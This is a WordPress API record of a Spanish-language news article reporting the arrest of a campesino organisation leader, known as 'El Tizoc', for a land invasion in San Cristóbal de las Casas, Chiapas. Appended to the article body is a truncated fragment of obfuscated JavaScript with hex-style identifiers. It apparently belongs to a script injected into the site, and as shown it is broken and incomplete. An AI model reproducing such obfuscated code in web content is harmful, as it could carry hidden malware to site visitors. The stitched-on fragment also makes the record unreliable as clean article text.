{"id":18057,"date":"2024-09-26T02:23:56","date_gmt":"2024-09-26T02:23:56","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=18057"},"modified":"2024-09-26T02:23:58","modified_gmt":"2024-09-26T02:23:58","slug":"detenido-el-tizoc-por-invasion-de-predio-en-sclc","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=18057","title":{"rendered":"Detenido &#8220;El Tizoc&#8221; por Invasi\u00f3n de Predio en SCLC"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"655\" height=\"790\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240925-WA0020.jpg\" alt=\"\" class=\"wp-image-18058\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240925-WA0020.jpg 655w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/09\/IMG-20240925-WA0020-249x300.jpg 249w\" sizes=\"auto, (max-width: 655px) 100vw, 655px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>25 de septiembre del 2024. San Crist\u00f3bal de las Casas.- La Fiscal\u00eda de Asuntos Especiales detuvo a Jos\u00e9 Luis S. G., conocido como &#8220;El Tizoc&#8221; o &#8220;El Colibr\u00ed&#8221;, l\u00edder de la Organizaci\u00f3n Campesina de Pueblos Ind\u00edgenas de M\u00e9xico (Ocapim). La detenci\u00f3n se llev\u00f3 a cabo en esta ciudad, tras la ejecuci\u00f3n de una orden de aprehensi\u00f3n vinculada a su participaci\u00f3n en la invasi\u00f3n de los predios denominados San Vicente 1, 2 y 3 de la Colonia Vista Hermosa Huitepec, de San Crist\u00f3bal de Las Casas, Chiapas.<\/p>\n\n\n\n<p>Seg\u00fan informaci\u00f3n no oficial, la captura de &#8220;El Tizoc&#8221; podr\u00eda estar relacionada con recientes rumores en redes sociales que indican que un grupo de personas planeaba intentar invadir nuevamente dicho predio, lo que llev\u00f3 a las autoridades a actuar con prontitud.<\/p>\n\n\n\n<p>Se ha confirmado que existe una carpeta de investigaci\u00f3n abierta por estos hechos, y se especula que podr\u00eda haber m\u00e1s l\u00edderes implicados en la situaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal 25 de septiembre del 2024. San Crist\u00f3bal de las Casas.- La Fiscal\u00eda de Asuntos Especiales detuvo a Jos\u00e9 Luis S. G., conocido como &#8220;El Tizoc&#8221; o &#8220;El Colibr\u00ed&#8221;, l\u00edder de la Organizaci\u00f3n Campesina de Pueblos Ind\u00edgenas de M\u00e9xico (Ocapim). La detenci\u00f3n se llev\u00f3 a cabo en esta ciudad, tras la ejecuci\u00f3n de una &hellip;<\/p>\n","protected":false},"author":2,"featured_media":18058,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-18057","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=18057"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18057\/revisions"}],"predecessor-version":[{"id":18059,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/18057\/revisions\/18059"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/18058"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=18057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=18057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=18057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}